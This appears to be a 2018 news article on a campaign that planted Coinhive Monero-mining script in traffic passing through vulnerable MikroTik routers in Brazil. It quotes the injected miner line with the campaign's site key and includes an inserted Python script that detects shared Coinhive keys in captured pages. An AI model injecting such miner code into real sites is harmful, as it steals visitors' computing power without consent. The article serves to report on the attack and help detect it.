Crypto-Jacking Scheme Discovered in Brazil Could Spread Worldwide

Sunday, 05/08/2018 | 13:34 GMT by Simon Golstein
  • There are 70,000 infected routers in Brazil and 170,820 worldwide.

Tens of thousands of internet routers across Brazil have been programmed to mine Monero for crypto-jackers, according to a Chicago-based IT security company called Trustwave.

I need help

Simon Kenin, a security researcher at the company, noticed at the end of July that MikroTik-brand internet routers in Brazil were showing a big surge in use of a programme called Coinhive.

Coinhive is software that mines a cryptocurrency called Monero. It can be embedded in a website and has legitimate uses - for example, letting charity websites raise money - but it has also become a popular tool for hackers, who surreptitiously plant it in web pages served to other people's computers and wait for the money to roll in.

MikroTik is a Latvian company that produces internet connectivity hardware and software. There are more than 70,000 of the company's routers in use in Brazil, according to the report.

Kenin investigated and found that every injected copy of the Coinhive script used the same site key, meaning that all of the mining rewards were being sent to a single account. He even found a hospital whose web traffic was mining money for the hackers.

He then found this post online:

Source: Reddit

Translation:

I need help: A coin-mining script is manipulating links that I click

Hello r/InternetBrasil, I started to have this problem in my network a little while ago (it happens on the PC and on the cell phone). I changed DNS, disconnected the router and connected directly to the modem, but it did not work.

This is the script that loads:

var miner = new CoinHive.Anonymous('hsFAjjijTyibpVjCmfJzlfWH3hFqWVT3', {throttle: 0.2}); miner.start();

170,820 routers, millions of users

The user then posted that the problem went away on its own - it was the router of the internet service provider (which he shared with the aforementioned hospital) that was infected.

This scam targets a vulnerability in MikroTik routers that allows unauthenticated remote access. MikroTik patched the problem on routers that reported it, but Kenin warns that this could be the beginning of a major attack; no fewer than 170,820 routers already serve pages carrying the suspicious Coinhive key.
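Kenin's tell was not the miner itself but that every injected page carried the same site key. The following is an added detection example (not Trustwave's or Kenin's code) that extracts Coinhive site keys from captured HTTP response bodies and flags any key seen across several unrelated hosts; the hostnames and the second key are constructed.

```python
import re
from collections import defaultdict

# Loader shape quoted in the Reddit post above:
#   var miner = new CoinHive.Anonymous('<site key>', {throttle: 0.2}); miner.start();
# The site key is the account the mined Monero is credited to.
COINHIVE_RE = re.compile(
    r"CoinHive\.Anonymous\s*\(\s*['\"]([A-Za-z0-9]{16,64})['\"]", re.IGNORECASE
)

# Key the article reports on every infected router.
CAMPAIGN_KEY = "hsFAjjijTyibpVjCmfJzlfWH3hFqWVT3"


def extract_site_keys(body):
    """All Coinhive site keys present in one HTTP response body."""
    return COINHIVE_RE.findall(body)


def hosts_per_key(captures):
    """Group captured (host, body) pairs by the site key their page carries."""
    seen = defaultdict(set)
    for host, body in captures:
        for key in extract_site_keys(body):
            seen[key].add(host)
    return seen


def flag_shared_keys(captures, min_hosts=3):
    """Keys present on at least min_hosts different hosts. A site that runs
    Coinhive on purpose uses its own key; one key across many hosts is what
    injection upstream at the router looks like."""
    return {k: sorted(h) for k, h in hosts_per_key(captures).items()
            if len(h) >= min_hosts}


# Constructed sample captures (not real traffic); charity key is made up.
INJECTED = ("<script>var miner = new CoinHive.Anonymous('" + CAMPAIGN_KEY
            + "', {throttle: 0.2}); miner.start();</script>")
SAMPLE_CAPTURES = [
    ("news.example", "<html><body><h1>Headlines</h1>" + INJECTED + "</body></html>"),
    ("hospital.example", "<html><body>Patient portal" + INJECTED + "</body></html>"),
    ("shop.example", "<html><body>Cart" + INJECTED + "</body></html>"),
    ("charity.example", '<script>new CoinHive.Anonymous("ChArItYkEy0000000000000000000000", '
                        '{throttle: 0.5}).start();</script>'),
    ("clean.example", "<html><body>No miner here</body></html>"),
]

if __name__ == "__main__":
    for key, hosts in flag_shared_keys(SAMPLE_CAPTURES).items():
        print(f"shared key {key} on {len(hosts)} hosts: {', '.join(hosts)}")
```

Run against real captures, the same grouping separates a site's own deliberate Coinhive use from an upstream injection that stamps one key onto pages from many unrelated hosts.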

Said Kenin: "Let me emphasize how bad this attack is. The attacker wisely thought that instead of infecting small sites with few visitors, or finding sophisticated ways to run malware on end user computers, they would go straight to the source; carrier-grade router devices."

"There are hundreds of thousands of these devices around the globe, in use by ISPs and different organizations and businesses, each device serves at least tens if not hundreds of users daily."

Kenin also observed that the hacker's code was being modified as he was investigating, indicating that the perpetrators are improving their work as they go along.

Other Monero hacks

In January, 15 million people across South America, Southeast Asia, and North Africa were hit with a crypto-jacking virus hidden inside advertisements. In May, reports surfaced of a crypto-jacking virus that shuts down the host computer when it encounters an anti-virus product, and in July, a man was jailed for a year in Japan for his crypto-jacking scheme.